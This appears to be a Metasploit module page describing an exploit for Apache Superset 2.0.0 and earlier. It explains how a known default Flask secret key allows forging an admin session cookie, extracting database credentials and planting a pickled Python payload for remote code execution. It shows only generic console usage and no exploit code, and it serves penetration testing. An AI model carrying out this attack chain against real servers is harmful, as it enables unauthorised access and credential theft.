Apache Superset Signed Cookie RCE
Description
Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies. These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be set for that dashboard within Superset's database which will trigger the RCE. An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.
Author(s)
- h00die
- paradoxis
- Spencer McIntyre
- Naveen Sunkavally
Platform
Python
Architectures
python
Development
Module Options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/linux/http/apache_superset_cookie_sig_rce
msf exploit(apache_superset_cookie_sig_rce) > show targets
...targets...
msf exploit(apache_superset_cookie_sig_rce) > set TARGET < target-id >
msf exploit(apache_superset_cookie_sig_rce) > show options
...show and set options...
msf exploit(apache_superset_cookie_sig_rce) > exploit
- Collect and share all the information you need to conduct a successful and efficient penetration test
- Simulate complex attacks against your systems and users
- Test your defenses to make sure they’re ready
- Automate Every Step of Your Penetration Test
Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
– Jim O’Gorman | President, Offensive Security